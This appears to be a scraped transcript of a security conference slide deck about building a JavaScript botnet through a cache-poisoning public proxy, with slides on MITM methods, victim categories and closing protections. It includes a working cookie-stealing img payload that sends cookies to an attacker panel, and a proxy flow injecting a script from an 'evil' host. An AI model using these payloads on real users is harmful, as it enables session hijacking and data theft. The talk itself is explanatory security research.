owning the bad guys
TRANSCRIPT
![Page 1: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/1.jpg)
Owning "bad" guys {and mafia} with Javascript botnets Chema Alonso & Manu “The Sur”
![Page 2: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/2.jpg)
Let´s do a botnet but… • We are lazy
• We haven´t money
• We haven´t 0day
• We aren´t the FBI
• We aren´t either:
• Apple
• Microsoft
![Page 3: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/3.jpg)
Let them to be infected
![Page 4: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/4.jpg)
Man in the Middle schemas • Intercept communications between client and server
• Compromised channel -> Pwned!
• Network
• ARP Spoofing
• Rogue DHCP(6)
• ICMPv6 Sppofing
• SLAAC Attacks
• DNS Spoofing
• …
• Evil FOCA Rulez!
![Page 5: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/5.jpg)
Man in the Browser
• Plugins
• BHO
• Addons
• Access to all data
• Passwords
• Code
• Banking trojans
• “A russian in my IE”
![Page 6: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/6.jpg)
JavaScript in the Middle • Poisoning Browser cache
• No permanent
• Deleting cache means infection cleaned
• Cached content is used if not expired
• Allows attackers to inject remote javascript
• Access to:
• Cookies
• Not HTTPOnly (more or less)
• HTML Code
• Form fields
• URLs
• Code execution
• …
![Page 7: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/7.jpg)
Google Analytics js & malware
![Page 8: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/8.jpg)
How to inject JavaScript code
• Persistent XSS
• Owning HTTP Servers
• Network Man In the middle attacks
• WiFi
• ARP Spoofing
• IPv6
• Memcache attacks
• Imagination
![Page 9: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/9.jpg)
- Framework to own bowser’s cache - Inject a javascript in each client - That javaScript loads payloads from C&C - http://beefproject.com - Very Well-Known
![Page 10: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/10.jpg)
How to create a JavaScript Botnet from the scratch
![Page 11: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/11.jpg)
TOR Nodes
![Page 12: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/12.jpg)
TOR Nodes
![Page 13: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/13.jpg)
Not a Rocket Scince….
![Page 14: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/14.jpg)
Buy a bullet-Prof
• Not:
• The Pirate Bay
• Amazon
• (Remenber Wikileaks)
• Megaupload
![Page 15: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/15.jpg)
Configure SQUID Proxy GET / HTTP/1.1 Host: www.web.com
GET / HTTP/1.1 Host: www.web.com
Response Home.html
Response Home.html
GET /a.jsp HTTP/1.1 Host: www.web.com
GET /a.jsp HTTP/1.1 Host: www.web.com
Response a.jsp
Response a.Jsp + pasarela.js include http://evil/payload.js
GET /payload.js HTTP/1.1 Host: evil
![Page 16: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/16.jpg)
Configure SQUID Proxy
Squid.conf: Activate URL rewrite program
.htaccess: Apache No Expiration Policy
![Page 17: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/17.jpg)
Infect all JavaScript files
![Page 18: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/18.jpg)
Infect all JavaScript files
![Page 19: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/19.jpg)
Publish your Proxy
![Page 20: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/20.jpg)
Let Internet do the magic
![Page 21: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/21.jpg)
Do Payloads: Cookie stealing
document.write(“
<img id='domaingrabber' src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&
domain="+document.domain+"&
location="+document.location+"&
cookie="+document.cookie+"' style='display:none;'/>");
![Page 22: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/22.jpg)
Do Payloads: Form fields stealing
![Page 23: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/23.jpg)
Enjoy
![Page 24: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/24.jpg)
Who ·”$”·$ is using this kind of services?
![Page 25: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/25.jpg)
Mafias: Help the Prince
![Page 26: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/26.jpg)
Mafias: Nigerian Scammers
![Page 27: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/27.jpg)
Mafias: Nigerian Scammers
![Page 28: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/28.jpg)
Mafias: Nigerian Scammers
![Page 29: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/29.jpg)
Mafias: Nigerian Scammers
![Page 30: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/30.jpg)
Mafias: Nigerian Scammers
![Page 31: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/31.jpg)
Mafias: Predators
![Page 32: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/32.jpg)
Mafias: Predators
![Page 33: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/33.jpg)
Mafias: Predators
![Page 34: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/34.jpg)
Mafias: Predators
![Page 35: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/35.jpg)
Mafias: Predators
![Page 36: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/36.jpg)
Mafias: Predators
![Page 37: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/37.jpg)
Mafias: Predators
![Page 38: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/38.jpg)
Dog Scammers
![Page 39: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/39.jpg)
Warning! This picture could hurt your emotions…
![Page 40: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/40.jpg)
Dog Scammers
![Page 41: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/41.jpg)
Psychotics
![Page 42: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/42.jpg)
Annonymous
![Page 43: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/43.jpg)
Annonymous
![Page 44: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/44.jpg)
Rare people in a rare World
![Page 45: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/45.jpg)
Hax0rs and defacers….
![Page 46: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/46.jpg)
…hacking…
![Page 47: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/47.jpg)
… and hacked
![Page 48: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/48.jpg)
Intranets
![Page 49: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/49.jpg)
And, of course, Pr0n
![Page 50: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/50.jpg)
Pr0n
![Page 51: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/51.jpg)
Do Payloads: Infect webs for the future
![Page 52: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/52.jpg)
Targeting Attacks
• Select the Target
• Bank
• Social Network
• Intranet
• Analyze loaded files
• Payload:
• Inject and load a infected file for that target, in every web the victim visits.
• Profit.
![Page 53: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/53.jpg)
Demo Facebook
![Page 54: Owning the bad guys](https://reader034.vdocuments.site/reader034/viewer/2022042716/55b36544bb61eba3548b473f/html5/thumbnails/54.jpg)
Protections
• Take care of mitm schemas
• Proxy
• TOR networks
• After using them, clean all
• Cache is not your friend on the Internet
• VPNs is not a silver bullet